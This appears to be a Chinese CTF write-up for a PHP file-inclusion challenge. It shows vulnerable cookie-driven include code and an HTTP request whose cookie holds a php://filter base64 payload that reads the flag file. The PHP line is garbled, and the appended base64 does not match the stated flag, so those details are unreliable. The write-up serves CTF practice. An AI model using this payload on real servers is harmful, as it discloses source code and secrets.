-
攻防世界-adworld-fileinclude
攻防世界-adworld-fileinclude
?php
if( !ini_get(‘display_errors’) ) {
ini_set(‘display_errors’, ‘On’);
}
error_reporting(E_ALL);
$lan = C O O K I E [ ′ l a n g u a g e ′ ] ; i f ( ! _COOKIE['language']; if(! COOKIE[′language′];if(!lan)
{
@setcookie(“language”,“english”);
@include(“english.php”);
}
else
{
@include($lan.“.php”);
}
$x=file_get_contents(‘index.php’);
echo $x;
?
GET / HTTP/1.1
Host: 61.147.171.105:54106
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: language=php://filter/read=convert.base64-encode/resource=/var/www/html/flagPD9waHANCiRmbGFnPSJjeWJlcnBlYWNlezczZDI2NmU3OTUyMjMxYTViMjZkZTFlMjg0ODM0Y2IyfSI7DQo/Pg==
找到flag
cyberpeace{f67525b85cbccbdfa4c05607fff7ce34}参考:https://blog.csdn.net/lyshark_lyshark/article/details/126799168
-
相关阅读:
开放原子训练营第三季——基于UBML开源项目的免费企业级低代码平台inBuilder低代码开发实验室圆满落幕!
微擎模块 柚子抽奖平台1.2.6 后台模块+前端小程序源码 增加发布抽奖图片自定义
输入重启gerrit容器命令后,gerrit起不来了什么原因
【C++】用constexpr,constinit,consteval让程序跑的快一点
Word处理控件Aspose.Words功能演示:在 Java 中将 Word 文档转换为 EPUB
两万字带你了解Java多线程(详细大总结)
自主研究,开发并产业化的一套UWB精确定位系统源码 UWB源码
Postman的高级使用,傻瓜式学习【下】
java-String原理-创建对象的个数
今年 A-Level 大考压分?成绩不理想怎么办?
- 原文地址:https://blog.csdn.net/m0_47210241/article/details/127722516